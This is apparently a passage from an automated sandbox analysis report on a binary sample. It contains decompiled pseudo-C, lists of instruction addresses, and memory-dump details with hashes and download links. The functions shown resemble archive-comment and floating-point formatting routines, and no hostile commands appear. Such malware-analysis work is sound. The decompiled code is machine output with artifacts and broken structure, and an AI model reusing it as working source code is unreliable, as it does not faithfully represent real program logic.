									 *((char*)(_t394 + 0x6cc5)) = 1;
									E00C36E03(0xc700e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E00C36BF5(_t563);
								E00C3E797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E00C33C40(_t394);
								E00C3607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E00C40FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}





























































                                            0x00c330fc
                                            0x00c330fd
                                            0x00c33105
                                            0x00c3310f
                                            0x00c33116
                                            0x00c3311d
                                            0x00c33124
                                            0x00c33127
                                            0x00c33130
                                            0x00c33279
                                            0x00c33279
                                            0x00c3327c
                                            0x00c33289
                                            0x00c3329a
                                            0x00c332a1
                                            0x00c332b1
                                            0x00c332bb
                                            0x00c332bd
                                            0x00c332c4
                                            0x00c332c6
                                            0x00c338f6
                                            0x00c338f8
                                            0x00c338fd
                                            0x00c33900
                                            0x00c3390e
                                            0x00c33919
                                            0x00c33919
                                            0x00c332cc
                                            0x00c332ce
                                            0x00000000
                                            0x00000000
                                            0x00c332d4
                                            0x00c332da
                                            0x00c332dc
                                            0x00c332dc
                                            0x00c332de
                                            0x00c332e1
                                            0x00000000
                                            0x00000000
                                            0x00c332e7
                                            0x00c332ea
                                            0x00000000
                                            0x00000000
                                            0x00c332f4
                                            0x00c332f9
                                            0x00c332fc
                                            0x00000000
                                            0x00000000
                                            0x00c33301
                                            0x00c33313
                                            0x00c33319
                                            0x00c3331e
                                            0x00c33329
                                            0x00c3332b
                                            0x00c33334
                                            0x00c3333a
                                            0x00c33340
                                            0x00c33346
                                            0x00c33349
                                            0x00c3334c
                                            0x00c3334e
                                            0x00c33388
                                            0x00c33388
                                            0x00c3338a
                                            0x00c33391
                                            0x00c33394
                                            0x00c33397
                                            0x00c333c1
                                            0x00c333c1
                                            0x00c333c8
                                            0x00c333ca
                                            0x00c333cd
                                            0x00c333d0
                                            0x00c333d5
                                            0x00c333da
                                            0x00c333dc
                                            0x00c333df
                                            0x00c333df
                                            0x00c333ea
                                            0x00c333f7
                                            0x00c33406
                                            0x00c3340f
                                            0x00c33417
                                            0x00c3341e
                                            0x00c33424
                                            0x00c33426
                                            0x00c33837
                                            0x00c33846
                                            0x00c33847
                                            0x00c33851
                                            0x00c3385a
                                            0x00c33867
                                            0x00c33876
                                            0x00c33881
                                            0x00c33884
                                            0x00c3388a
                                            0x00c33890
                                            0x00c33892
                                            0x00c33898
                                            0x00c3389b
                                            0x00c338b2
                                            0x00c3389d
                                            0x00c338a5
                                            0x00c338ad
                                            0x00c338af
                                            0x00c338af
                                            0x00c338b8
                                            0x00c338bf
                                            0x00c338c9
                                            0x00c338c9
                                            0x00000000
                                            0x00c338c1
                                            0x00c338c1
                                            0x00c338c7
                                            0x00c338cb
                                            0x00c338cb
                                            0x00c338d1
                                            0x00c338d6
                                            0x00c338d9
                                            0x00c338e9
                                            0x00c338e9
                                            0x00c338ee
                                            0x00c338f1
                                            0x00000000
                                            0x00c338f1
                                            0x00000000
                                            0x00c338c7
                                            0x00c338bf
                                            0x00c3342c
                                            0x00000000
                                            0x00000000
                                            0x00c33432
                                            0x00c33435
                                            0x00c33577
                                            0x00c3357f
                                            0x00c3358e
                                            0x00c33592
                                            0x00c33595
                                            0x00c3359c
                                            0x00c335a3
                                            0x00c335ae
                                            0x00c335b1
                                            0x00c335b7
                                            0x00c335c0
                                            0x00c335c7
                                            0x00c335d5
                                            0x00c335e0
                                            0x00c335ef
                                            0x00c335ef
                                            0x00c335f1
                                            0x00c335f7
                                            0x00c335fd
                                            0x00c33604
                                            0x00c3360a
                                            0x00c3360a
                                            0x00c33610
                                            0x00c33616
                                            0x00c3361c
                                            0x00c33622
                                            0x00c33628
                                            0x00c3362a
                                            0x00c33632
                                            0x00c33632
                                            0x00c33634
                                            0x00000000
                                            0x00c3362c
                                            0x00c3362c
                                            0x00c33636
                                            0x00c33636
                                            0x00c3363f
                                            0x00c33645
                                            0x00c3364a
                                            0x00c33651
                                            0x00c33654
                                            0x00c33667
                                            0x00c33667
                                            0x00c3366c
                                            0x00c33673
                                            0x00c3367a
                                            0x00c3367f
                                            0x00c3368e
                                            0x00c3368e
                                            0x00c33694
                                            0x00c3369e
                                            0x00c336a5
                                            0x00c336ae
                                            0x00c336b6
                                            0x00c336b9
                                            0x00c336bc
                                            0x00c336bf
                                            0x00c336c1
                                            0x00c336c1
                                            0x00c336d3
                                            0x00c336e7
                                            0x00c336e9
                                            0x00c336f3
                                            0x00c336f8
                                            0x00c336fe
                                            0x00c33700
                                            0x00c3370a
                                            0x00c3370c
                                            0x00c3370e
                                            0x00c3370e
                                            0x00c3370e
                                            0x00c3370e
                                            0x00c33702
                                            0x00c33702
                                            0x00c33702
                                            0x00c33715
                                            0x00c3371f
                                            0x00c33731
                                            0x00c33737
                                            0x00c3373b
                                            0x00c3373e
                                            0x00c33744
                                            0x00c3374f
                                            0x00c3374f
                                            0x00c3374f
                                            0x00000000
                                            0x00c33746
                                            0x00c33746
                                            0x00c33749
                                            0x00000000
                                            0x00000000
                                            0x00c3374b
                                            0x00c33751
                                            0x00c33751
                                            0x00c3375d
                                            0x00c33762
                                            0x00c33777
                                            0x00c3377d
                                            0x00c3378c
                                            0x00c33791
                                            0x00c3379c
                                            0x00c3379e
                                            0x00c337a0
                                            0x00c337a0
                                            0x00c337ad
                                            0x00c337b2
                                            0x00c337c0
                                            0x00c337c5
                                            0x00c337c8
                                            0x00c337c9
                                            0x00c337ca
                                            0x00c337cf
                                            0x00c337d4
                                            0x00c337d7
                                            0x00c337e1
                                            0x00c337e1
                                            0x00c337e6
                                            0x00c337e9
                                            0x00c337ec
                                            0x00c337fe
                                            0x00c33804
                                            0x00c3380b
                                            0x00c3380d
                                            0x00c3380f
                                            0x00c3380f
                                            0x00000000
                                            0x00c337ee
                                            0x00c337f1
                                            0x00c337f6
                                            0x00c337f9
                                            0x00c337fc
                                            0x00c33816
                                            0x00c33816
                                            0x00c3381a
                                            0x00c33827
                                            0x00c33827
                                            0x00000000
                                            0x00c3381a
                                            0x00000000
                                            0x00c337fc
                                            0x00c337ec
                                            0x00c33744
                                            0x00c3362e
                                            0x00c33630
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c33630
                                            0x00c3362a
                                            0x00c3343b
                                            0x00c3343e
                                            0x00c3347f
                                            0x00c3348c
                                            0x00c33491
                                            0x00c33496
                                            0x00c33498
                                            0x00c334cf
                                            0x00c334da
                                            0x00c334dd
                                            0x00c334e3
                                            0x00c334e6
                                            0x00c334fc
                                            0x00c33501
                                            0x00c33508
                                            0x00c33516
                                            0x00c33524
                                            0x00c3352d
                                            0x00c33539
                                            0x00c33541
                                            0x00c33546
                                            0x00c33555
                                            0x00c3355f
                                            0x00c33561
                                            0x00c33561
                                            0x00c33563
                                            0x00c33563
                                            0x00c33569
                                            0x00000000
                                            0x00c33569
                                            0x00c334e8
                                            0x00c334e9
                                            0x00c334a0
                                            0x00c334a3
                                            0x00c334a5
                                            0x00c334a6
                                            0x00c334b8
                                            0x00000000
                                            0x00c334b8
                                            0x00c3349a
                                            0x00c3349b
                                            0x00000000
                                            0x00c3349b
                                            0x00c33440
                                            0x00c33443
                                            0x00c3344a
                                            0x00c33457
                                            0x00c33463
                                            0x00c3346b
                                            0x00c33472
                                            0x00c33472
                                            0x00000000
                                            0x00c33443
                                            0x00c333a1
                                            0x00c333a3
                                            0x00c333a6
                                            0x00c333a8
                                            0x00c333ab
                                            0x00c333ad
                                            0x00000000
                                            0x00000000
                                            0x00c333af
                                            0x00000000
                                            0x00000000
                                            0x00c333b5
                                            0x00c333bb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c333bb
                                            0x00c33352
                                            0x00c3335e
                                            0x00c33365
                                            0x00c3336a
                                            0x00c3336e
                                            0x00000000
                                            0x00c33370
                                            0x00c33377
                                            0x00c3337c
                                            0x00000000
                                            0x00c3337c
                                            0x00c3336e
                                            0x00c3328b
                                            0x00c3328d
                                            0x00000000
                                            0x00c3328d
                                            0x00c3313e
                                            0x00c33141
                                            0x00c33143
                                            0x00c33149
                                            0x00000000
                                            0x00c3315d
                                            0x00c33162
                                            0x00c33164
                                            0x00c33167
                                            0x00c33171
                                            0x00000000
                                            0x00000000
                                            0x00c33184
                                            0x00c33193
                                            0x00c33193
                                            0x00c33197
                                            0x00c33199
                                            0x00c331b5
                                            0x00c331c1
                                            0x00c331cd
                                            0x00c331d9
                                            0x00c33255
                                            0x00c33255
                                            0x00000000
                                            0x00c331db
                                            0x00c331db
                                            0x00c331e1
                                            0x00c331e8
                                            0x00c331ed
                                            0x00c331f2
                                            0x00000000
                                            0x00000000
                                            0x00c331f4
                                            0x00c331f8
                                            0x00c331fb
                                            0x00c331fc
                                            0x00c331fd
                                            0x00c3325a
                                            0x00c3325c
                                            0x00c33268
                                            0x00c3326f
                                            0x00000000
                                            0x00c3326f
                                            0x00c331ff
                                            0x00c33201
                                            0x00c33212
                                            0x00c33219
                                            0x00c33241
                                            0x00c3324d
                                            0x00c33253
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c33253
                                            0x00000000
                                            0x00c331e1
                                            0x00c331d9
                                            0x00c33186
                                            0x00c3318b
                                            0x00c33191
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c33191

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog_memcmp
                                            • String ID: CMT$h%u$hc%u
                                            • API String ID: 3004599000-3282847064
                                            • Opcode ID: 8a5384f69c2dc869fac841785cb906f9a89175296b1e5ff7bc48da92820136e8
                                            • Instruction ID: ec9d3b3c14a5b5e19cf7958c373a9afcefee055fb09e8f46820f8257cbc77193
                                            • Opcode Fuzzy Hash: 8a5384f69c2dc869fac841785cb906f9a89175296b1e5ff7bc48da92820136e8
                                            • Instruction Fuzzy Hash: 4832D2715203849FDF14DF74C886AEA37A5AF55300F08447EFD9ADB282DB30AA49DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5C55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00C5C55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				unsigned int _t1170;
				void* _t1174;
				void* _t1175;
				unsigned int _t1176;
				signed int _t1181;
				signed int _t1182;
				signed int _t1184;
				signed int _t1185;
				intOrPtr* _t1187;
				signed int _t1188;
				signed int _t1190;
				signed int _t1191;
				signed int _t1194;
				signed int _t1196;
				signed int _t1197;
				void* _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				void* _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int* _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				intOrPtr* _t1218;
				intOrPtr* _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1226;
				signed int _t1232;
				signed int _t1236;
				signed int _t1237;
				signed int _t1242;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1270;
				signed int _t1273;
				signed int _t1275;
				signed int* _t1276;
				signed int* _t1279;
				signed int _t1288;

				_t1142 = __edx;
				_t1273 = _t1275;
				_t1276 = _t1275 - 0x964;
				_t743 =  *0xc6d668; // 0x13bcba52
				_v8 = _t743 ^ _t1273;
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1187 = _a16;
				_v1924 = _t1187;
				_v1920 = _t1055;
				E00C5C078( &_v1944, __eflags);
				_t1236 = _a8;
				_t748 = 0x2d;
				if((_t1236 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1187 = _t748;
				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
				_t1188 = _a4;
				if((_t1236 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00C586BF( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1188;
									_a8 = _t1236 & 0x7fffffff;
									_t1288 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1190 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1190 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1191 = _t1190 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1242;
									E00C5E0C0(_t1078, _t1288);
									_push(_t1078);
									_push(_t1078);
									 *_t1276 = _t1288;
									_t790 = E00C60F10(E00C5E1D0(_t1191, _t1242), _t1288);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1191;
									_v464 = _t1191;
									_t1061 = (0 | _t1191 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1242;
									if(_t1242 < 0) {
										__eflags = _t1242 - 0xfffffc02;
										if(_t1242 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00C5AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E00C4E920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E00C4E920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00C5AA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E00C4DDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00C5AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E00C4DDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
